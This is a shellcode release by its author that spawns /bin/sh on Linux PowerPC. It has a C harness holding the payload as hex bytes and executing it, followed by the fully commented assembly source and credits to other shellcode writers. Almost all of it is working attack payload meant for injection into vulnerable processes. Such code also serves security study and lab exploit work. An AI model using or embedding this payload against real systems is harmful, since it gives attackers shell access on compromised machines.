/* execve-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* execve /bin/sh linux/ppc by core */
// Sometimes you can comment out the next line if space is needed
"\x7c\x3f\x0b\x78"  /*mr  r31,r1*/
"\x7c\xa5\x2a\x79"  /*xor.  r5,r5,r5*/
"\x42\x40\xff\xf9"  /*bdzl+  10000454<main>*/
"\x7f\x08\x02\xa6"  /*mflr  r24*/
"\x3b\x18\x01\x34"  /*addi  r24,r24,308*/
"\x98\xb8\xfe\xfb"  /*stb  r5,-261(r24)*/
"\x38\x78\xfe\xf4"  /*addi  r3,r24,-268*/
"\x90\x61\xff\xf8"  /*stw  r3,-8(r1)*/
"\x38\x81\xff\xf8"  /*addi  r4,r1,-8*/
"\x90\xa1\xff\xfc"  /*stw  r5,-4(r1)*/
"\x3b\xc0\x01\x60"  /*li  r30,352*/
"\x7f\xc0\x2e\x70"  /*srawi  r0,r30,5*/
"\x44\xde\xad\xf2"  /*.long  0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n",
         strlen(hellcode));
  shell();
  return 0;
}

#;;; PowerPC Linux Execve /bin/sh Shellcode
#;;; 
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their
#;;; significant research without which none of this would be possible.
#;;;
#;;; Fsck: drow for never sharing his shellcode. Security through
#;;; obscurity never lasts forever man what did you expect? :)
#;;;
#;;; Note: Since this code is self modifying it'll crash if you just
#;;; compile the .s and run it directly. ;-) Copy somewhere writable
#;;; or run within gdb
#;;; 
#;;; Last Updated: Wed Feb 16 20:14:43 MST 2005

.globl main
main:
  #;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!!
  #;; This critical step cost me HOURS upon hours in gdb stepping
  #;; through one instruction at a time! :/ Somtimes you can omit
  #;mr      %r31, %r1

#;;; execve("/bin/sh",["/bin/sh",NULL],NULL);  
  #;; GPR5 = 0 and CR = 0
  #;; NOTE: xor != xor. (dot means update CR) 
  #;; *** THANKS GHANDI!!! ***
  xor.  %r5, %r5, %r5

  #;; branch if counter is zero and store the address in
  #;; link register (counter is 0 since we just loaded it;)
  bdzl  main
  
  #;; move the address of main to GPR24
  mflr  %r24
  
  #;; get offset to /bin/sh 
  addi    %r24, %r24, 268 + 40
  
  #;; add null to end of string
  stb  %r5, -261(%r24)

  #;; store pointer to /bin/sh
  subi    %r3, %r24, 268
  stw     %r3, -8(%r1)

  #;; r4 = argument pointer
  subi    %r4, %r1, 8

  #;; push environment pointer
  stw     %r5, -4(%r1)

  #;; syscall(__NR_execve)
  li  %r30, 11*32
  srawi  %r0, %r30, 5
  .long  0x44deadf2 #;sc
  
  #;; /xxx/xxZ do not remove the Z!
  .ascii "/bin/shZ"

#;;; EOF